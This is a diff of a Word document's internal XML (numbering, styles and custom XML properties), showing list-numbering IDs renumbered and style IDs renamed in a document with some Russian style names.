     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="FA0AF57C"/>
@@ -25711,7 +27542,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="35" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="36" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="65A774EE"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="5074E7A0"/>
@@ -25830,7 +27661,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="36" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="37" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="6A1A402B"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="C6DC9E6C"/>
@@ -25943,7 +27774,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="37" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="38" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="6C414346"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="305E0592"/>
@@ -26056,7 +27887,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="38" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="39" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="711C097B"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="896A3E34"/>
@@ -26169,7 +28000,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="39" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="40" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="71CC7E40"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="402ADE06"/>
@@ -26282,7 +28113,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="40" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="41" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="731F3380"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="9A588F68"/>
@@ -26401,7 +28232,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="41" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="42" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="73CC2112"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="2E525322"/>
@@ -26514,7 +28345,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="42" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="43" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="759A68C9"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="9A7E3A24"/>
@@ -26627,7 +28458,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="43" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="44" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="770B262D"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="94F64E5E"/>
@@ -26740,7 +28571,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="44" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="45" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="7A5843BF"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="D054D920"/>
@@ -26859,7 +28690,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="45" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="46" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="7BC3444D"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="318EA18A"/>
@@ -26973,55 +28804,55 @@
     </w:lvl>
   </w:abstractNum>
   <w:num w:numId="1">
-    <w:abstractNumId w:val="11"/>
+    <w:abstractNumId w:val="12"/>
   </w:num>
   <w:num w:numId="2">
-    <w:abstractNumId w:val="17"/>
+    <w:abstractNumId w:val="18"/>
   </w:num>
   <w:num w:numId="3">
-    <w:abstractNumId w:val="23"/>
+    <w:abstractNumId w:val="24"/>
   </w:num>
   <w:num w:numId="4">
-    <w:abstractNumId w:val="44"/>
+    <w:abstractNumId w:val="45"/>
   </w:num>
   <w:num w:numId="5">
-    <w:abstractNumId w:val="41"/>
+    <w:abstractNumId w:val="42"/>
   </w:num>
   <w:num w:numId="6">
     <w:abstractNumId w:val="0"/>
   </w:num>
   <w:num w:numId="7">
-    <w:abstractNumId w:val="28"/>
+    <w:abstractNumId w:val="29"/>
   </w:num>
   <w:num w:numId="8">
-    <w:abstractNumId w:val="19"/>
+    <w:abstractNumId w:val="20"/>
   </w:num>
   <w:num w:numId="9">
-    <w:abstractNumId w:val="38"/>
+    <w:abstractNumId w:val="39"/>
   </w:num>
   <w:num w:numId="10">
-    <w:abstractNumId w:val="9"/>
+    <w:abstractNumId w:val="10"/>
   </w:num>
   <w:num w:numId="11">
-    <w:abstractNumId w:val="21"/>
+    <w:abstractNumId w:val="22"/>
   </w:num>
   <w:num w:numId="12">
-    <w:abstractNumId w:val="42"/>
+    <w:abstractNumId w:val="43"/>
   </w:num>
   <w:num w:numId="13">
-    <w:abstractNumId w:val="45"/>
+    <w:abstractNumId w:val="46"/>
   </w:num>
   <w:num w:numId="14">
-    <w:abstractNumId w:val="22"/>
+    <w:abstractNumId w:val="23"/>
   </w:num>
   <w:num w:numId="15">
-    <w:abstractNumId w:val="26"/>
+    <w:abstractNumId w:val="27"/>
   </w:num>
   <w:num w:numId="16">
-    <w:abstractNumId w:val="15"/>
+    <w:abstractNumId w:val="16"/>
   </w:num>
   <w:num w:numId="17">
-    <w:abstractNumId w:val="8"/>
+    <w:abstractNumId w:val="9"/>
   </w:num>
   <w:num w:numId="18">
     <w:abstractNumId w:val="2"/>
@@ -27030,91 +28861,94 @@
     <w:abstractNumId w:val="1"/>
   </w:num>
   <w:num w:numId="20">
+    <w:abstractNumId w:val="7"/>
+  </w:num>
+  <w:num w:numId="21">
+    <w:abstractNumId w:val="33"/>
+  </w:num>
+  <w:num w:numId="22">
+    <w:abstractNumId w:val="44"/>
+  </w:num>
+  <w:num w:numId="23">
+    <w:abstractNumId w:val="11"/>
+  </w:num>
+  <w:num w:numId="24">
     <w:abstractNumId w:val="6"/>
   </w:num>
-  <w:num w:numId="21">
+  <w:num w:numId="25">
     <w:abstractNumId w:val="32"/>
-  </w:num>
-  <w:num w:numId="22">
-    <w:abstractNumId w:val="43"/>
-  </w:num>
-  <w:num w:numId="23">
-    <w:abstractNumId w:val="10"/>
-  </w:num>
-  <w:num w:numId="24">
-    <w:abstractNumId w:val="5"/>
-  </w:num>
-  <w:num w:numId="25">
-    <w:abstractNumId w:val="31"/>
   </w:num>
   <w:num w:numId="26">
     <w:abstractNumId w:val="3"/>
   </w:num>
   <w:num w:numId="27">
+    <w:abstractNumId w:val="38"/>
+  </w:num>
+  <w:num w:numId="28">
+    <w:abstractNumId w:val="28"/>
+  </w:num>
+  <w:num w:numId="29">
+    <w:abstractNumId w:val="34"/>
+  </w:num>
+  <w:num w:numId="30">
+    <w:abstractNumId w:val="15"/>
+  </w:num>
+  <w:num w:numId="31">
+    <w:abstractNumId w:val="25"/>
+  </w:num>
+  <w:num w:numId="32">
+    <w:abstractNumId w:val="19"/>
+  </w:num>
+  <w:num w:numId="33">
+    <w:abstractNumId w:val="40"/>
+  </w:num>
+  <w:num w:numId="34">
+    <w:abstractNumId w:val="13"/>
+  </w:num>
+  <w:num w:numId="35">
+    <w:abstractNumId w:val="26"/>
+  </w:num>
+  <w:num w:numId="36">
+    <w:abstractNumId w:val="36"/>
+  </w:num>
+  <w:num w:numId="37">
+    <w:abstractNumId w:val="41"/>
+  </w:num>
+  <w:num w:numId="38">
+    <w:abstractNumId w:val="14"/>
+  </w:num>
+  <w:num w:numId="39">
+    <w:abstractNumId w:val="30"/>
+  </w:num>
+  <w:num w:numId="40">
+    <w:abstractNumId w:val="8"/>
+  </w:num>
+  <w:num w:numId="41">
     <w:abstractNumId w:val="37"/>
   </w:num>
-  <w:num w:numId="28">
-    <w:abstractNumId w:val="27"/>
-  </w:num>
-  <w:num w:numId="29">
-    <w:abstractNumId w:val="33"/>
-  </w:num>
-  <w:num w:numId="30">
-    <w:abstractNumId w:val="14"/>
-  </w:num>
-  <w:num w:numId="31">
-    <w:abstractNumId w:val="24"/>
-  </w:num>
-  <w:num w:numId="32">
-    <w:abstractNumId w:val="18"/>
-  </w:num>
-  <w:num w:numId="33">
-    <w:abstractNumId w:val="39"/>
-  </w:num>
-  <w:num w:numId="34">
-    <w:abstractNumId w:val="12"/>
-  </w:num>
-  <w:num w:numId="35">
-    <w:abstractNumId w:val="25"/>
-  </w:num>
-  <w:num w:numId="36">
+  <w:num w:numId="42">
     <w:abstractNumId w:val="35"/>
   </w:num>
-  <w:num w:numId="37">
-    <w:abstractNumId w:val="40"/>
-  </w:num>
-  <w:num w:numId="38">
-    <w:abstractNumId w:val="13"/>
-  </w:num>
-  <w:num w:numId="39">
-    <w:abstractNumId w:val="29"/>
-  </w:num>
-  <w:num w:numId="40">
-    <w:abstractNumId w:val="7"/>
-  </w:num>
-  <w:num w:numId="41">
-    <w:abstractNumId w:val="36"/>
-  </w:num>
-  <w:num w:numId="42">
-    <w:abstractNumId w:val="34"/>
-  </w:num>
   <w:num w:numId="43">
-    <w:abstractNumId w:val="30"/>
+    <w:abstractNumId w:val="31"/>
   </w:num>
   <w:num w:numId="44">
-    <w:abstractNumId w:val="20"/>
+    <w:abstractNumId w:val="21"/>
   </w:num>
   <w:num w:numId="45">
-    <w:abstractNumId w:val="16"/>
+    <w:abstractNumId w:val="17"/>
   </w:num>
   <w:num w:numId="46">
     <w:abstractNumId w:val="4"/>
+  </w:num>
+  <w:num w:numId="47">
+    <w:abstractNumId w:val="5"/>
   </w:num>
 </w:numbering>
 </file>
 
 <file path=word/styles.xml><?xml version="1.0" encoding="utf-8"?>
-<w:styles xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" mc:Ignorable="w14 w15">
+<w:styles xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" mc:Ignorable="w14 w15 w16se">
   <w:docDefaults>
     <w:rPrDefault>
       <w:rPr>
@@ -27724,7 +29558,6 @@
   <w:style w:type="character" w:default="1" w:styleId="a0">
     <w:name w:val="Default Paragraph Font"/>
     <w:uiPriority w:val="1"/>
-    <w:semiHidden/>
     <w:unhideWhenUsed/>
   </w:style>
   <w:style w:type="table" w:default="1" w:styleId="a1">
@@ -39497,10 +41330,10 @@
     <w:name w:val="Ссылка указателя"/>
     <w:qFormat/>
   </w:style>
-  <w:style w:type="paragraph" w:customStyle="1" w:styleId="af2">
-    <w:name w:val="Заголовок"/>
+  <w:style w:type="paragraph" w:customStyle="1" w:styleId="12">
+    <w:name w:val="Заголовок1"/>
     <w:basedOn w:val="a"/>
-    <w:next w:val="af3"/>
+    <w:next w:val="af2"/>
     <w:qFormat/>
     <w:pPr>
       <w:keepNext/>
@@ -39511,21 +41344,21 @@
       <w:szCs w:val="28"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="paragraph" w:styleId="af3">
+  <w:style w:type="paragraph" w:styleId="af2">
     <w:name w:val="Body Text"/>
     <w:basedOn w:val="a"/>
     <w:pPr>
       <w:spacing w:after="140" w:line="276" w:lineRule="auto"/>
     </w:pPr>
   </w:style>
-  <w:style w:type="paragraph" w:styleId="af4">
+  <w:style w:type="paragraph" w:styleId="af3">
     <w:name w:val="List"/>
-    <w:basedOn w:val="af3"/>
+    <w:basedOn w:val="af2"/>
     <w:rPr>
       <w:rFonts w:cs="Mangal"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="paragraph" w:styleId="af5">
+  <w:style w:type="paragraph" w:styleId="af4">
     <w:name w:val="caption"/>
     <w:basedOn w:val="a"/>
     <w:uiPriority w:val="35"/>
@@ -39540,16 +41373,16 @@
       <w:szCs w:val="18"/>
     </w:rPr>
   </w:style>
+  <w:style w:type="paragraph" w:styleId="af5">
+    <w:name w:val="index heading"/>
+    <w:basedOn w:val="12"/>
+  </w:style>
   <w:style w:type="paragraph" w:styleId="af6">
-    <w:name w:val="index heading"/>
-    <w:basedOn w:val="af2"/>
-  </w:style>
-  <w:style w:type="paragraph" w:styleId="af7">
     <w:name w:val="No Spacing"/>
     <w:uiPriority w:val="1"/>
     <w:qFormat/>
   </w:style>
-  <w:style w:type="paragraph" w:styleId="af8">
+  <w:style w:type="paragraph" w:styleId="af7">
     <w:name w:val="Subtitle"/>
     <w:basedOn w:val="a"/>
     <w:uiPriority w:val="11"/>
@@ -39574,7 +41407,7 @@
       <w:i/>
     </w:rPr>
   </w:style>
-  <w:style w:type="paragraph" w:styleId="af9">
+  <w:style w:type="paragraph" w:styleId="af8">
     <w:name w:val="Intense Quote"/>
     <w:basedOn w:val="a"/>
     <w:uiPriority w:val="30"/>
@@ -39594,7 +41427,7 @@
       <w:i/>
     </w:rPr>
   </w:style>
-  <w:style w:type="paragraph" w:styleId="afa">
+  <w:style w:type="paragraph" w:styleId="af9">
     <w:name w:val="endnote text"/>
     <w:basedOn w:val="a"/>
     <w:uiPriority w:val="99"/>
@@ -39667,7 +41500,7 @@
       <w:ind w:left="2268"/>
     </w:pPr>
   </w:style>
-  <w:style w:type="paragraph" w:styleId="afb">
+  <w:style w:type="paragraph" w:styleId="afa">
     <w:name w:val="Title"/>
     <w:basedOn w:val="a"/>
     <w:uiPriority w:val="10"/>
@@ -39685,12 +41518,12 @@
       <w:szCs w:val="56"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="paragraph" w:customStyle="1" w:styleId="afc">
+  <w:style w:type="paragraph" w:customStyle="1" w:styleId="afb">
     <w:name w:val="Колонтитул"/>
     <w:basedOn w:val="a"/>
     <w:qFormat/>
   </w:style>
-  <w:style w:type="paragraph" w:styleId="afd">
+  <w:style w:type="paragraph" w:styleId="afc">
     <w:name w:val="header"/>
     <w:basedOn w:val="a"/>
     <w:uiPriority w:val="99"/>
@@ -39703,7 +41536,7 @@
       <w:spacing w:after="0"/>
     </w:pPr>
   </w:style>
-  <w:style w:type="paragraph" w:styleId="afe">
+  <w:style w:type="paragraph" w:styleId="afd">
     <w:name w:val="footer"/>
     <w:basedOn w:val="a"/>
     <w:uiPriority w:val="99"/>
@@ -39716,7 +41549,7 @@
       <w:spacing w:after="0"/>
     </w:pPr>
   </w:style>
-  <w:style w:type="paragraph" w:styleId="aff">
+  <w:style w:type="paragraph" w:styleId="afe">
     <w:name w:val="annotation text"/>
     <w:basedOn w:val="a"/>
     <w:uiPriority w:val="99"/>
@@ -39728,9 +41561,9 @@
       <w:szCs w:val="20"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="paragraph" w:styleId="aff0">
+  <w:style w:type="paragraph" w:styleId="aff">
     <w:name w:val="annotation subject"/>
-    <w:basedOn w:val="aff"/>
+    <w:basedOn w:val="afe"/>
     <w:uiPriority w:val="99"/>
     <w:semiHidden/>
     <w:unhideWhenUsed/>
@@ -39740,7 +41573,7 @@
       <w:bCs/>
     </w:rPr>
   </w:style>
-  <w:style w:type="paragraph" w:styleId="aff1">
+  <w:style w:type="paragraph" w:styleId="aff0">
     <w:name w:val="Balloon Text"/>
     <w:basedOn w:val="a"/>
     <w:uiPriority w:val="99"/>
@@ -39756,7 +41589,7 @@
       <w:szCs w:val="18"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="paragraph" w:styleId="aff2">
+  <w:style w:type="paragraph" w:styleId="aff1">
     <w:name w:val="TOC Heading"/>
     <w:basedOn w:val="1"/>
     <w:uiPriority w:val="39"/>
@@ -39776,7 +41609,7 @@
       <w:lang w:val="en-US"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="paragraph" w:styleId="12">
+  <w:style w:type="paragraph" w:styleId="13">
     <w:name w:val="toc 1"/>
     <w:basedOn w:val="a"/>
     <w:uiPriority w:val="39"/>
@@ -39801,7 +41634,7 @@
       <w:b/>
     </w:rPr>
   </w:style>
-  <w:style w:type="paragraph" w:styleId="aff3">
+  <w:style w:type="paragraph" w:styleId="aff2">
     <w:name w:val="footnote text"/>
     <w:basedOn w:val="a"/>
     <w:uiPriority w:val="99"/>
@@ -39815,7 +41648,7 @@
       <w:szCs w:val="20"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="paragraph" w:styleId="aff4">
+  <w:style w:type="paragraph" w:styleId="aff3">
     <w:name w:val="table of figures"/>
     <w:basedOn w:val="a"/>
     <w:uiPriority w:val="99"/>
@@ -39854,7 +41687,7 @@
       <w:ind w:left="560"/>
     </w:pPr>
   </w:style>
-  <w:style w:type="paragraph" w:styleId="aff5">
+  <w:style w:type="paragraph" w:styleId="aff4">
     <w:name w:val="List Paragraph"/>
     <w:basedOn w:val="a"/>
     <w:uiPriority w:val="34"/>
@@ -40116,7 +41949,7 @@
 </file>
 
 <file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{1AFE02E0-CEF0-4326-AE2B-A04115FE3BD7}">
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{666BC90C-0B8F-4589-B57E-CD07F0CD683D}">
   <ds:schemaRefs>
     <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
   </ds:schemaRefs>
